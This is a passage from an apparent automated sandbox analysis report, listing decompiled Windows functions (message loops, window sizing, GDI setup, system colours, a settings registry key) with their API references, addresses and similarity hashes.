							if( *((intOrPtr*)( *_t78 + 0x70))() == 0) {
								 *(_t78 + 0x24) =  *(_t78 + 0x24) & 0xffffffe7;
								return  *((intOrPtr*)(_t78 + 0x2c));
							} else {
								_t54 = E004126FB();
								_push(_t80);
								if( *((intOrPtr*)( *_t54 + 0x64))() != 0) {
									 *((intOrPtr*)(_t81 + 0x18)) = 1;
									 *(_t81 + 0x14) = 0;
								}
								if(PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L4;
								}
							}
						}
						return E00429977(0) | 0xffffffff;
					}
					if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
						E0041668C(_t78, 1);
						UpdateWindow( *(_t78 + 0x1c));
						 *((intOrPtr*)(_t81 + 0x10)) = 0;
					}
					if(( *(_t81 + 0x24) & 0x00000001) == 0 &&  *(_t81 + 0x1c) != 0 &&  *(_t81 + 0x14) == 0) {
						SendMessageA( *(_t81 + 0x28), 0x121, 0,  *(_t78 + 0x1c));
					}
					if(( *(_t81 + 0x24) & 0x00000002) != 0) {
						L14:
						 *((intOrPtr*)(_t81 + 0x18)) = 0;
						goto L4;
					} else {
						 *(_t81 + 0x14) =  *(_t81 + 0x14) + 1;
						if(SendMessageA( *(_t78 + 0x1c), 0x36a, 0,  *(_t81 + 0x14)) != 0) {
							goto L4;
						}
						goto L14;
					}
				}
				_t66 = E00416528(__ecx);
				 *((intOrPtr*)(_t81 + 0x10)) = _t67;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}

0x00415f2b
0x00415f2c
0x00415f2e
0x00415f32
0x00415f36
0x00415f48
0x00415f48
0x00415f4c
0x00415f4f
0x00415f55
0x00415f59
0x00415f6a
0x00000000
0x00415f6d
0x00415fe9
0x00415ffd
0x00415fff
0x00416007
0x00416014
0x0041601c
0x0041601e
0x0041601e
0x00416007
0x0041602b
0x00416069
0x00000000
0x0041602d
0x0041602d
0x00416034
0x0041603c
0x0041603e
0x00416046
0x00416046
0x00416057
0x00000000
0x00416059
0x00000000
0x00416059
0x00416057
0x0041602b
0x00000000
0x00416064
0x00415f86
0x00415f8c
0x00415f94
0x00415f96
0x00415f96
0x00415f9f
0x00415fba
0x00415fba
0x00415fc5
0x00415fe3
0x00415fe3
0x00000000
0x00415fc7
0x00415fcb
0x00415fe1
0x00000000
0x00000000
0x00000000
0x00415fe1
0x00415fc5
0x00415f38
0x00415f42
0x00415f46
0x00000000
0x00000000
0x00000000

APIs

GetParent.USER32(?), ref: 00415F4F
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00415F78
UpdateWindow.USER32(?), ref: 00415F94
SendMessageA.USER32 ref: 00415FBA
SendMessageA.USER32 ref: 00415FD9
UpdateWindow.USER32(?), ref: 0041601C
PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0041604F

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 9a012ef07eff98838d374f75436147ff2ba7ed0a7bc557100502bfdd7ab44939
Instruction ID: a9d405acd130b45d961834bac1476ad35e2ab5294cb8f6c1009cd3559e17cf10
Opcode Fuzzy Hash: 9a012ef07eff98838d374f75436147ff2ba7ed0a7bc557100502bfdd7ab44939
Instruction Fuzzy Hash: 49418030604B41DBD720DF26C844E9BBFE4FFC5B54F140A1EF48186291D779D986CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 004296EA, Relevance: 10.6, APIs: 7, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004296EA(void* __ebx, int __ecx, void* __edi, intOrPtr _a4) {
				struct HDC__* _t26;
				struct tagSIZE* _t39;
				int _t43;
				long _t45;
				struct tagSIZE* _t48;
				int _t51;

				_t41 = __ecx;
				_t51 = __ecx;
				if(_a4 != 0) {
					_t39 = __ecx + 0x38;
					GetViewportExtEx( *(__ecx + 8), _t39);
					_t48 = __ecx + 0x30;
					GetWindowExtEx( *(__ecx + 8), _t48);
					if(_t48->cx > 0xffffc000) {
						while(1) {
							_t41 = _t48->cx;
							if(_t41 >= 0x4000) {
								goto L6;
							}
							_t45 = _t39->cx;
							if(_t45 > 0xffffc000 && _t45 < 0x4000) {
								_t41 = _t41 + _t41;
								_t48->cx = _t41;
								_t39->cx = _t45 + _t45;
								if(_t41 > 0xffffc000) {
									continue;
								}
							}
							goto L6;
						}
					}
					L6:
					if( *(_t51 + 0x34) > 0xffffc000) {
						while(1) {
							_t41 =  *(_t51 + 0x34);
							if(_t41 >= 0x4000) {
								goto L11;
							}
							_t43 =  *(_t51 + 0x3c);
							if(_t43 > 0xffffc000 && _t43 < 0x4000) {
								_t41 = _t41 + _t41;
								 *(_t51 + 0x34) = _t41;
								 *(_t51 + 0x3c) = _t43 + _t43;
								if(_t41 > 0xffffc000) {
									continue;
								}
							}
							goto L11;
						}
					}
					L11:
					_t39->cx = E00428907(_t41, _t39->cx,  *((intOrPtr*)(_t51 + 0x10)),  *0x439bf8,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x58));
					 *(_t51 + 0x3c) = E00428907(_t41,  *(_t51 + 0x3c),  *((intOrPtr*)(_t51 + 0x10)),  *0x439bfc,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x5a));
				}
				_t26 =  *(_t51 + 4);
				if(_t26 != 0) {
					SetMapMode(_t26, 8);
					SetWindowExtEx( *(_t51 + 4),  *(_t51 + 0x30),  *(_t51 + 0x34), 0);
					SetViewportExtEx( *(_t51 + 4),  *(_t51 + 0x38),  *(_t51 + 0x3c), 0);
					return E004297EF(_t51);
				}
				return _t26;
			}

0x004296ea
0x004296f0
0x004296f2
0x004296f9
0x00429701
0x00429707
0x0042970e
0x0042971b
0x0042971d
0x0042971d
0x00429725
0x00000000
0x00000000
0x00429727
0x0042972b
0x00429735
0x0042973b
0x0042973d
0x0042973f
0x00000000
0x00000000
0x0042973f
0x00000000
0x0042972b
0x0042971d
0x00429741
0x00429744
0x00429746
0x00429746
0x0042974f
0x00000000
0x00000000
0x00429751
0x00429756
0x00429760
0x00429766
0x00429769
0x0042976c
0x00000000
0x00000000
0x0042976c
0x00000000
0x00429756
0x00429746
0x0042976e
0x00429791
0x004297ae
0x004297b1
0x004297b2
0x004297b7
0x004297bc
0x004297cd
0x004297de
0x00000000
0x004297e6
0x004297ec

APIs

GetViewportExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 00429701
GetWindowExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 0042970E
GetDeviceCaps.GDI32(?,00000058), ref: 00429779
GetDeviceCaps.GDI32(?,0000005A), ref: 00429796
SetMapMode.GDI32(00000000,00000008), ref: 004297BC
SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 004297CD
SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 004297DE

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CapsDeviceViewportWindow$Mode
String ID:
API String ID: 396987064-0
Opcode ID: 3345bb5a9094e8666eaa33ece795193da96925dfc51a5fc8830be66225611f93
Instruction ID: 029ae3144c04a12eb84a26ff9b3d66945ac525f496733399c5de6a1960b9f250
Opcode Fuzzy Hash: 3345bb5a9094e8666eaa33ece795193da96925dfc51a5fc8830be66225611f93
Instruction Fuzzy Hash: F2312871200A11EFDB715F25EE80B2BBBB6FF94700B90982DE28691A60D775A8519B08

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF70, Relevance: 10.6, APIs: 7, Instructions: 74windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0041FF8D
GetMessageA.USER32 ref: 0041FF9B
DispatchMessageA.USER32 ref: 0041FFAE
SetRectEmpty.USER32(?), ref: 0041FFD7
GetDesktopWindow.USER32 ref: 0041FFEF
LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 00420000
GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 00420017

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
String ID:
API String ID: 1192691108-0
Opcode ID: 788c472facf28495b2051c77c94d9c198475e2b8af682ce7500eb59dc763f021
Instruction ID: 7b4feb9468581440af327a22176e3db1bbe8d75c7627dd3e4d63dbf17c191cc2
Opcode Fuzzy Hash: 788c472facf28495b2051c77c94d9c198475e2b8af682ce7500eb59dc763f021
Instruction Fuzzy Hash: 6B2162B1600709AFD7209F65EC84E67BBECFB08384B44483EF545C6151D735F8469B64

Uniqueness

Uniqueness Score: -1.00%

Function 004152C7, Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004152C7(struct HDWP__** _a4, struct HWND__* _a8, RECT* _a12) {
				struct tagRECT _v20;
				int _t15;
				int _t23;
				struct HDWP__* _t25;
				struct HWND__* _t26;
				int _t27;
				long _t28;
				struct HDWP__** _t35;
				RECT* _t37;

				_t26 = _a8;
				_t15 = GetParent(_t26);
				_t35 = _a4;
				_a8 = _t15;
				if(_t35 == 0 ||  *_t35 != 0) {
					GetWindowRect(_t26,  &_v20);
					ScreenToClient(_a8,  &_v20);
					ScreenToClient(_a8,  &(_v20.right));
					_t37 = _a12;
					_t15 = EqualRect( &_v20, _t37);
					if(_t15 == 0) {
						_t23 = _t37->top;
						_t27 = _t37->left;
						_t28 = _t37->bottom;
						_push(0x14);
						if(_t35 == 0) {
							return SetWindowPos(_t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
						}
						_t25 = DeferWindowPos( *_t35, _t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
						 *_t35 = _t25;
						return _t25;
					}
				}
				return _t15;
			}

0x004152ce
0x004152d4
0x004152da
0x004152dd
0x004152e2
0x004152ee
0x00415301
0x0041530a
0x0041530c
0x00415314
0x0041531c
0x0041531e
0x00415321
0x00415323
0x00415326
0x0041532a
0x00000000
0x00415354
0x0041533c
0x00415342
0x00000000
0x00415342
0x0041531c
0x0041535e

APIs

GetParent.USER32(?), ref: 004152D4
GetWindowRect.USER32 ref: 004152EE
ScreenToClient.USER32 ref: 00415301
ScreenToClient.USER32 ref: 0041530A
EqualRect.USER32 ref: 00415314
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0041533C
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,00000000,00000000,?), ref: 00415354

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 6a085f23455b506641fb664c9f872d6e0eb60696c2830eab613455ce1ebaad90
Instruction ID: 07014e229ed6a7b25482b6998f11fd7e237ae46f5a3226271598de642c651d74
Opcode Fuzzy Hash: 6a085f23455b506641fb664c9f872d6e0eb60696c2830eab613455ce1ebaad90
Instruction Fuzzy Hash: FB117F76600609FFE7109F68CC88EBBBBBDEB88710F108529B91593215E774AD418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00425DE9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425DE9(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x7c), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x90), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x00425dff
0x00425e0b
0x00425e0e
0x00425e11
0x00425e14
0x00425e1f
0x00425e59
0x00425e59
0x00425e64
0x00425e69
0x00425e69
0x00425e6e
0x00425e73
0x00425e73
0x00425e7c

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00425E17
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00425E3A
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00425E59
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00425E69
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00425E73

Strings

software, xrefs: 00425E01

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: ef35ffc1de14d179d2ad0911c310037a7393524ecf252a7ab65d51927ebb2645
Instruction ID: 0af0f3997741b28716963c04c81515c15655377052ffcc376828dcfe476aa2da
Opcode Fuzzy Hash: ef35ffc1de14d179d2ad0911c310037a7393524ecf252a7ab65d51927ebb2645
Instruction Fuzzy Hash: 0311F872A00528FBCB21CB96DC84DEFFFBCEF89744F5000AAA515A2121D3705A01DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404F6B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00404F6B(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t18;
				intOrPtr* _t22;
				intOrPtr _t30;

				if(E00404DD2() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						return 0;
					}
					_t22 = _a8;
					if(_t22 == 0 ||  *_t22 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t22 + 4)) = 0;
						 *((intOrPtr*)(_t22 + 8)) = 0;
						 *((intOrPtr*)(_t22 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t30 = 1;
						 *(_t22 + 0x10) = _t18;
						 *((intOrPtr*)(_t22 + 0x24)) = _t30;
						if( *_t22 >= 0x48) {
							lstrcpyA(_t22 + 0x28, "DISPLAY");
						}
						return _t30;
					}
				}
				return  *0x439618(_a4, _a8);
			}

0x00404f7a
0x00404f91
0x00404ff6
0x00000000
0x00404ff6
0x00404f93
0x00404f9a
0x00000000
0x00404fb3
0x00404fb4
0x00404fb7
0x00404fc5
0x00404fc8
0x00404fd0
0x00404fd1
0x00404fd2
0x00404fd8
0x00404fd9
0x00404fda
0x00404fdd
0x00404fe1
0x00404fec
0x00404fec
0x00000000
0x00404ff2
0x00404f9a
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00404FA9
GetSystemMetrics.USER32 ref: 00404FC1
GetSystemMetrics.USER32 ref: 00404FC8
lstrcpyA.KERNEL32(?,DISPLAY), ref: 00404FEC

Strings

B, xrefs: 00404F8A
DISPLAY, xrefs: 00404FE6

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: System$Metrics$InfoParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1409579217-3316187204
Opcode ID: fc4978af5ac8f74fb81d04261746e33f8207f39954ecdab6ad15e40bdb5edc53
Instruction ID: 0269e9ff9c82b1da89f60d18f206ef68f762114564e5db41c1733f16ce370355
Opcode Fuzzy Hash: fc4978af5ac8f74fb81d04261746e33f8207f39954ecdab6ad15e40bdb5edc53
Instruction Fuzzy Hash: 0411C6B1600326ABDB119F649C8469BBFA8EF45750B508073FE05AE182D7B9D941CBF8

Uniqueness

Uniqueness Score: -1.00%

Function 0040381D, Relevance: 10.6, APIs: 7, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040381D(intOrPtr _a4) {
				long _v8;
				long _v12;
				struct tagMSG _v40;

				if(_a4 != 0) {
					_v8 = GetTickCount();
					while(1 != 0) {
						_v12 = GetTickCount();
						if(_v12 < _v8 || _v12 - _v8 > _a4) {
							break;
						} else {
							if(PeekMessageA( &_v40, 0, 0, 0, 0) == 0) {
								Sleep(1);
							} else {
								GetMessageA( &_v40, 0, 0, 0);
								TranslateMessage( &_v40);
								DispatchMessageA( &_v40);
							}
							continue;
						}
					}
					return 1;
				}
				return 1;
			}

0x00403827
0x00403833
0x00403836
0x00403845
0x0040384e
0x00000000
0x0040385d
0x00403871
0x0040389b
0x00403873
0x0040387d
0x00403887
0x00403891
0x00403891
0x00000000
0x004038a1
0x0040384e
0x00000000
0x004038a3
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040382D
GetTickCount.KERNEL32 ref: 0040383F

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 62664b2ccced0f01c7f848e18cfdb5bd16bdfa6a3194e22d98a032b2161cbf00
Instruction ID: 9bbdf3f7d950dda3c106a7053e01199b699c7596eca1dee1c5b4b451079f442e
Opcode Fuzzy Hash: 62664b2ccced0f01c7f848e18cfdb5bd16bdfa6a3194e22d98a032b2161cbf00
Instruction Fuzzy Hash: 6D11F431A00208EBEB10EFA0D949B9D7BF8AB04705F6081A5F905B61C0D775AB469B99

Uniqueness

Uniqueness Score: -1.00%

Function 00417178, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417178(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x00417180
0x00417188
0x0041718f
0x00417196
0x0041719d
0x004171aa
0x004171b1
0x004171b4
0x004171b6
0x004171bb

APIs

GetSysColor.USER32(0000000F), ref: 00417184
GetSysColor.USER32(00000010), ref: 0041718B
GetSysColor.USER32(00000014), ref: 00417192
GetSysColor.USER32(00000012), ref: 00417199
GetSysColor.USER32(00000006), ref: 004171A0
GetSysColorBrush.USER32(0000000F), ref: 004171AD
GetSysColorBrush.USER32(00000006), ref: 004171B4

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 80a27b1f02e3c58edf4c19fbc6f0daf7df48ddc1e8fb47ec45f2cb1cd70874ec
Instruction ID: 88891574432b8891f472ad4648ce297f27c70735abb480ab9afea6e1339babde
Opcode Fuzzy Hash: 80a27b1f02e3c58edf4c19fbc6f0daf7df48ddc1e8fb47ec45f2cb1cd70874ec
Instruction Fuzzy Hash: 3AF01C71A407489BD730BF729D49B47BBE0FFC4B10F42092EE2858BA91E6B5A401DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0042047F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042047F() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L6:
						 *0x439628 =  *0x439628 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L6;
					}
					goto L5;
				} else {
					L5:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x439628 = _t6;
					return _t6;
				}
			}

0x00420495
0x0042049f
0x004204a3
0x004204bf
0x004204bf
0x00000000
0x004204bf
0x004204a5
0x004204ab
0x00000000
0x00000000
0x00000000
0x004204ad
0x004204ad
0x004204b2
0x004204b8
0x00000000
0x004204b8

APIs

GetVersion.KERNEL32 ref: 0042048C
GetVersion.KERNEL32 ref: 00420497
GetVersion.KERNEL32 ref: 0042049F
GetVersion.KERNEL32 ref: 004204A5
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 004204B2

Strings

MSWHEEL_ROLLMSG, xrefs: 004204AD

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Version$MessageRegisterWindow
String ID: MSWHEEL_ROLLMSG
API String ID: 303823969-2485103130
Opcode ID: 26758afab022c1db6d696d894fb3c80caf3662092470fbb9c82adf2f042b39ed
Instruction ID: 25fbbff43e00deea4677d8a477c73a5b9be4ee826b54bccf5d226778cb27c547
Opcode Fuzzy Hash: 26758afab022c1db6d696d894fb3c80caf3662092470fbb9c82adf2f042b39ed
Instruction Fuzzy Hash: DFE0803EF0123646D72137647C0436E66D49F88360FE5D17BDB41423555A7C484346BE

Uniqueness

Uniqueness Score: -1.00%

Function 00426D87, Relevance: 9.2, APIs: 6, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00426D87(void* __ecx) {
				struct HDC__* _t87;
				intOrPtr* _t88;
				struct HDC__* _t97;
				intOrPtr _t98;
				int _t100;
				struct HDC__* _t110;
				int _t122;
				intOrPtr* _t126;
				void* _t136;
				intOrPtr* _t137;
				struct HDC__** _t138;
				int _t153;
				intOrPtr _t157;
				signed short _t171;
				int _t175;
				void* _t178;
				void* _t180;

				E00406520(E0042A133, _t180);
				_t178 = __ecx;
				 *(__ecx + 0x70) =  *(_t180 + 8);
				_t87 = E004131DD(0x3c);
				 *(_t180 + 8) = _t87;
				 *(_t180 - 4) =  *(_t180 - 4) & 0x00000000;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00428824(_t87);
				}
				 *((intOrPtr*)(_t178 + 0x114)) = _t88;
				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
				 *((intOrPtr*)( *_t88 + 0x3c)) = 0x7009;
				_t175 = 1;
				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) | 0x00000040;
				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) & 0x000000fe;
				 *( *((intOrPtr*)(_t178 + 0x114)) + 8) = _t175;
				_t97 = E004131DD(0x40);
				 *(_t180 + 8) = _t97;
				_t186 = _t97;
				 *(_t180 - 4) = _t175;
				if(_t97 == 0) {
					_t98 = 0;
					__eflags = 0;
				} else {
					_t98 = E00428A66(_t97, _t186);
				}
				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t178 + 0x74)) = _t98;
				_t100 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf4))( *((intOrPtr*)(_t178 + 0x114)));
				if(_t100 != 0) {
					_t137 = _t178 + 0x78;
					E00419BB7(_t137,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0xc))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)), _t136);
					 *( *((intOrPtr*)(_t178 + 0x74)) + 0xc) = _t175;
					 *(_t178 + 0x84) = _t175;
					 *((intOrPtr*)( *_t137 + 0x1c))();
					_t110 = GetDC( *(_t178 + 0x1c));
					 *(_t180 + 8) = _t110;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x10))(_t110);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf8))( *((intOrPtr*)(_t178 + 0x74)),  *((intOrPtr*)(_t178 + 0x114)));
